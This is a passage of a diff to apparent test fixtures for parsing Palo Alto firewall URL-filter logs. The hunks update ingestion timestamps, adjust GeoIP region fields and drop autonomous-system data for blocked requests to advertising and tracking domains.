"lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -3811,7 +3701,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691770900Z", + "ingested": "2021-12-14T14:50:40.980244751Z", "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", @@ -3839,22 +3729,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -3985,7 +3870,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691774900Z", + "ingested": "2021-12-14T14:50:40.980245099Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4013,22 +3898,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -4159,7 +4039,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691782700Z", + "ingested": "2021-12-14T14:50:40.980245551Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4187,22 +4067,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -4333,7 +4208,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691788200Z", + "ingested": "2021-12-14T14:50:40.980245895Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4361,22 +4236,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -4507,7 +4377,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691794800Z", + "ingested": "2021-12-14T14:50:40.980246244Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4535,22 +4405,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -4681,7 +4546,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691801100Z", + "ingested": "2021-12-14T14:50:40.980246589Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4709,22 +4574,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -4855,7 +4715,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691807400Z", + "ingested": "2021-12-14T14:50:40.980246945Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4883,22 +4743,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -5029,7 +4884,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691813700Z", + "ingested": "2021-12-14T14:50:40.980247291Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5057,22 +4912,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -5203,7 +5053,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691820Z", + "ingested": "2021-12-14T14:50:40.980247637Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5231,22 +5081,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -5377,7 +5222,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691826300Z", + "ingested": "2021-12-14T14:50:40.980248001Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5405,22 +5250,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -5551,7 +5391,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691832800Z", + "ingested": "2021-12-14T14:50:40.980248342Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5579,22 +5419,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -5725,7 +5560,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691839300Z", + "ingested": "2021-12-14T14:50:40.980248706Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5753,22 +5588,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -5899,7 +5729,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691845600Z", + "ingested": "2021-12-14T14:50:40.980249058Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5927,22 +5757,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -6073,7 +5898,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691852100Z", + "ingested": "2021-12-14T14:50:40.980249515Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -6101,22 +5926,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -6247,7 +6067,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691858600Z", + "ingested": "2021-12-14T14:50:40.980249863Z", "original": "Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:53.000-05:00", "timezone": "America/New_York", @@ -6275,22 +6095,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -6421,7 +6236,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691864900Z", + "ingested": "2021-12-14T14:50:40.980250203Z", "original": "Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:54.000-05:00", "timezone": "America/New_York", @@ -6449,22 +6264,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -6595,7 +6405,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691871300Z", + "ingested": "2021-12-14T14:50:40.980250550Z", "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", @@ -6623,22 +6433,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -6769,7 +6574,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691877600Z", + "ingested": "2021-12-14T14:50:40.980250980Z", "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", @@ -6797,22 +6602,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -6943,7 +6743,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691883900Z", + "ingested": "2021-12-14T14:50:40.980251325Z", "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", @@ -6971,22 +6771,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -7117,7 +6912,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691888200Z", + "ingested": "2021-12-14T14:50:40.980251670Z", "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", @@ -7145,22 +6940,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -7291,7 +7081,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691893300Z", + "ingested": "2021-12-14T14:50:40.980252017Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", @@ -7319,22 +7109,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -7465,7 +7250,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691898900Z", + "ingested": "2021-12-14T14:50:40.980252373Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", @@ -7493,22 +7278,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
